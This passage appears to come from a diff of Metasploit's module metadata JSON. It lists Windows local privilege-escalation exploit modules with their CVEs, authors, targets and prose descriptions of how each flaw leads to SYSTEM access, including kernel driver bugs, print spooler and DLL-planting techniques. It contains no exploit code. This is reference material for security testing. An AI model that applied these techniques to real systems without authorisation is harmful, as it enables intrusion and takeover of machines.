leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.", - "references": [ - "CVE-2021-40449", - "URL-https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/", - "URL-https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ", - "URL-https://github.com/KaLendsi/CVE-2021-40449-Exploit", - "URL-https://github.com/ly4k/CallbackHell" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" - ], - "mod_time": "2024-02-07 11:28:00 +0000", - "path": "/modules/exploits/windows/local/cve_2021_40449.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2021_40449", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2022_21882_win32k": { - "name": "Win32k ConsoleControl Offset Confusion", - "fullname": "exploit/windows/local/cve_2022_21882_win32k", - "aliases": [ - "exploit/windows/local/cve_2021_1732_win32k" - ], - "rank": 200, - "disclosure_date": "2021-02-09", - "type": "exploit", - "author": [ - "BITTER APT", - "JinQuan", - "MaDongZe", - "TuXiaoYi", - "LiHao", - "L4ys", - "KaLendsi", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.", - "references": [ - "CVE-2021-1732", - "URL-https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/", - "URL-https://github.com/KaLendsi/CVE-2021-1732-Exploit", - "URL-https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732", - "URL-https://www.fuzzysecurity.com/tutorials/expDev/22.html", - "URL-https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm", - "URL-https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html", - "URL-https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html", - "CVE-2022-21882", - "URL-https://github.com/L4ys/CVE-2022-21882", - "URL-https://github.com/KaLendsi/CVE-2022-21882" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1803-21H2 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2022_21882_win32k.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_21882_win32k", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2022_21999_spoolfool_privesc": { - "name": "CVE-2022-21999 SpoolFool Privesc", - "fullname": "exploit/windows/local/cve_2022_21999_spoolfool_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-02-08", - "type": "exploit", - "author": [ - "Oliver Lyak", - "Shelby Pace" - ], - "description": "The Windows Print Spooler has a privilege escalation vulnerability that\n can be leveraged to achieve code execution as SYSTEM.\n\n The `SpoolDirectory`, a configuration setting that holds the path that\n a printer's spooled jobs are sent to, is writable for all users, and it can\n be configured via `SetPrinterDataEx()` provided the caller has the\n `PRINTER_ACCESS_ADMINISTER` permission. If the `SpoolDirectory` path does not\n exist, it will be created once the print spooler reinitializes.\n\n Calling `SetPrinterDataEx()` with the `CopyFiles\\` registry key will load the\n dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory`\n location can be loaded by the print spooler.\n\n Using a directory junction and UNC path for the `SpoolDirectory`, the exploit\n writes a payload to `C:\\Windows\\System32\\spool\\drivers\\x64\\4` and loads it\n by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.", - "references": [ - "URL-https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81", - "CVE-2022-21999" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Auto" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_21999_spoolfool_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SpoolFool" - ], - "Stability": [ - "crash-service-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2022_26904_superprofile": { - "name": "User Profile Arbitrary Junction Creation Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2022_26904_superprofile", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-03-17", - "type": "exploit", - "author": [ - "KLINIX5", - "Grant Willcox" - ], - "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.", - "references": [ - "CVE-2022-26904", - "URL-https://github.com/rmusser01/SuperProfile", - "URL-https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html", - "URL-https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 11" - ], - "mod_time": "2024-02-07 11:30:42 +0000", - "path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_26904_superprofile", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects", - "audio-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": { - "name": "Lenovo Diagnostics Driver IOCTL memmove", - "fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver", - "aliases": [], - "rank": 400, - "disclosure_date": "2022-11-09", - "type": "exploit", - "author": [ - "alfarom256", - "jheysel-r7" - ], - "description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n issue device IOCTLs to perform arbitrary physical/virtual memory read/write.", - "references": [ - "CVE-2022-3699", - "URL-https://github.com/alfarom256/CVE-2022-3699/" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-11-28 14:35:26 +0000", - "path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2023_21768_afd_lpe": { - "name": "Ancillary Function Driver (AFD) for WinSock Elevation of Privilege", - "fullname": "exploit/windows/local/cve_2023_21768_afd_lpe", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-01-10", - "type": "exploit", - "author": [ - "chompie", - "b33f", - "Yarden Shafir", - "Christophe De La Fuente" - ], - "description": "A vulnerability exists in the Windows Ancillary Function Driver for Winsock\n (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is\n possible to create an arbitrary kernel Write-Where primitive, which can be used\n to manipulate internal I/O ring structures and achieve local privilege\n escalation.\n\n This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in\n January 2023 updates).", - "references": [ - "CVE-2023-21768", - "URL-https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768", - "URL-https://github.com/yardenshafir/IoRingReadWritePrimitive" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 11 22H2 x64" - ], - "mod_time": "2023-04-04 09:48:51 +0000", - "path": "/modules/exploits/windows/local/cve_2023_21768_afd_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2023_21768_afd_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2023_28252_clfs_driver": { - "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability", - "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver", - "aliases": [], - "rank": 400, - "disclosure_date": "2023-04-11", - "type": "exploit", - "author": [ - "Ricardo Narvaja", - "Esteban.kazimirow", - "jheysel-r7" - ], - "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n The clfs.sys driver contains a function CreateLogFile that is used to create\n open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which\n contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n The exploits creates a controlled memory space by first looping over the CreatePipe function to\n to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in\n depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).", - "references": [ - "CVE-2023-28252", - "URL-https://github.com/fortra/CVE-2023-28252" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-09-11 13:10:57 +0000", - "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2023_28252_clfs_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_30085_cloud_files": { - "name": "Windows Cloud File Mini Filer Driver Heap Overflow", - "fullname": "exploit/windows/local/cve_2024_30085_cloud_files", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-12-19", - "type": "exploit", - "author": [ - "Alex Birnberg", - "ssd-disclosure", - "bwatters-r7" - ], - "description": "This module exploits the Windows Cloud Files Mini FIlter Driver cldflt.sys on Windows workstation versions\n 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.", - "references": [ - "CVE-2024-30085", - "URL-https://attackerkb.com/topics/EHiwxpT2Dp/cve-2024-30085", - "URL-https://ssd-disclosure.com/ssd-advisory-cldflt-heap-based-overflow-pe/", - "URL-https://starlabs.sg/blog/2024/all-i-want-for-christmas-is-a-cve-2024-30085-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2025-01-10 16:14:32 +0000", - "path": "/modules/exploits/windows/local/cve_2024_30085_cloud_files.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2024_30085_cloud_files", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_30088_authz_basep": { - "name": "Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes", - "fullname": "exploit/windows/local/cve_2024_30088_authz_basep", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-11", - "type": "exploit", - "author": [ - "tykawaii98", - "jheysel-r7" - ], - "description": "CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,\n Windows 11 and Windows Server 2022.\n\n The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when\n the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the\n kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure\n directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and\n `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading\n to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.", - "references": [ - "URL-https://github.com/tykawaii98/CVE-2024-30088", - "CVE-2024-30038" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2025-03-13 13:14:13 +0000", - "path": "/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2024_30088_authz_basep", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_35250_ks_driver": { - "name": "Windows Access Mode Mismatch LPE in ks.sys", - "fullname": "exploit/windows/local/cve_2024_35250_ks_driver", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-11", - "type": "exploit", - "author": [ - "AngelBoy", - "varwara", - "jheysel-r7" - ], - "description": "The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.\n There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,\n Windows 11, Windows Server 2022.", - "references": [ - "URL-https://github.com/varwara/CVE-2024-35250", - "URL-https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/", - "URL-https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html", - "CVE-2024-35250" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-11-06 09:13:51 +0000", - "path": "/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2024_35250_ks_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/dnsadmin_serverlevelplugindll": { - "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation", - "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-08", - "type": "exploit", - "author": [ - "Shay Ber", - "Imran E. Dawoodjee " - ], - "description": "This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the\n `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`\n named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service\n will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended\n when using a UNC path.\n\n Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,\n the DNS server on the target will not be able to restart. Similarly if a UNC share is not utilized, and\n users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus\n after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the\n `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key on the target computer may point to an nonexistant DLL,\n which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for\n this module for advice on how to resolve this issue should it occur.\n\n This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows\n Server version up to and including Windows Server 2019.", - "references": [ - "URL-https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "URL-https://adsecurity.org/?p=4064", - "URL-http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb", - "is_install_path": true, - "ref_name": "windows/local/dnsadmin_serverlevelplugindll", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/docker_credential_wincred": { - "name": "Docker-Credential-Wincred.exe Privilege Escalation", - "fullname": "exploit/windows/local/docker_credential_wincred", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-07-05", - "type": "exploit", - "author": [ - "Morgan Roman", - "bwatters-r7" - ], - "description": "This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.", - "references": [ - "CVE-2019-15752", - "URL-https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/local/docker_credential_wincred.rb", - "is_install_path": true, - "ref_name": "windows/local/docker_credential_wincred", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc": { - "name": "Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation", - "fullname": "exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-25", - "type": "exploit", - "author": [ - "Chris Lyne", - "Matteo Malvica", - "bcoles " - ], - "description": "Druva inSync client for Windows exposes a network service on TCP\n port 6064 on the local network interface. inSync versions 6.6.3\n and prior do not properly validate user-supplied program paths\n in RPC type 5 messages, allowing execution of arbitrary commands\n as SYSTEM.\n\n This module has been tested successfully on inSync versions\n 6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).", - "references": [ - "CVE-2019-3999", - "CVE-2020-5752", - "EDB-48400", - "EDB-48505", - "EDB-49211", - "PACKETSTORM-157493", - "PACKETSTORM-157802", - "PACKETSTORM-160404", - "URL-https://www.tenable.com/security/research/tra-2020-12", - "URL-https://www.tenable.com/security/research/tra-2020-34", - "URL-https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py", - "URL-https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/gog_galaxyclientservice_privesc": { - "name": "GOG GalaxyClientService Privilege Escalation", - "fullname": "exploit/windows/local/gog_galaxyclientservice_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-04-28", - "type": "exploit", - "author": [ - "Joe Testa " - ], - "description": "This module will send arbitrary file_paths to the GOG GalaxyClientService, which will be executed\n with SYSTEM privileges (verified on GOG Galaxy Client v1.2.62 and v2.0.12; prior versions are\n also likely affected).", - "references": [ - "URL-https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/", - "CVE-2020-7352" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows (Dropper)" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/gog_galaxyclientservice_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ikeext_service": { - "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL", - "fullname": "exploit/windows/local/ikeext_service", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-10-09", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.", - "references": [ - "URL-https://www.htbridge.com/advisory/HTB23108", - "URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ikeext_service.rb", - "is_install_path": true, - "ref_name": "windows/local/ikeext_service", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ipass_launch_app": { - "name": "iPass Mobile Client Service Privilege Escalation", - "fullname": "exploit/windows/local/ipass_launch_app", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-12", - "type": "exploit", - "author": [ - "h0ng10" - ], - "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.", - "references": [ - "CVE-2015-0925", - "URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ipass_launch_app.rb", - "is_install_path": true, - "ref_name": "windows/local/ipass_launch_app", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/lenovo_systemupdate": { - "name": "Lenovo System Update Privilege Escalation", - "fullname": "exploit/windows/local/lenovo_systemupdate", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-04-12", - "type": "exploit", - "author": [ - "Michael Milvich", - "Sofiane Talmat", - "h0ng10" - ], - "description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service provides the possibility to execute arbitrary\n commands as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.", - "references": [ - "OSVDB-121522", - "CVE-2015-2219", - "URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/lenovo_systemupdate.rb", - "is_install_path": true, - "ref_name": "windows/local/lenovo_systemupdate", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/lexmark_driver_privesc": { - "name": "Lexmark Driver Privilege Escalation", - "fullname": "exploit/windows/local/lexmark_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-07-15", - "type": "exploit", - "author": [ - "Jacob Baines", - "Shelby Pace", - "Grant Willcox" - ], - "description": "Various Lexmark Universal Printer drivers as listed at advisory TE953\n allow low-privileged authenicated users to elevate their privileges to\n SYSTEM on affected Windows systems by modifying the XML file at\n C:\\ProgramData\\\\Universal Color Laser.gdl\n to replace the DLL path to unires.dll with a malicious DLL path.\n\n When C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is\n then used to add the printer to the affected system, PrintIsolationHost.exe,\n a Windows process running as NT AUTHORITY\\SYSTEM, will inspect the\n C:\\ProgramData\\\\Universal Color Laser.gdl file and will\n load the malicious DLL from the path specified in the file. This which will\n result in the malicious DLL executing as NT AUTHORITY\\SYSTEM.\n\n Once this module is finished, it will use the prnmngr.vbs script\n to remove the printer it added.", - "references": [ - "CVE-2021-35449", - "URL-http://support.lexmark.com/index?page=content&id=TE953", - "URL-https://github.com/jacob-baines/concealed_position", - "URL-https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/lexmark_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - 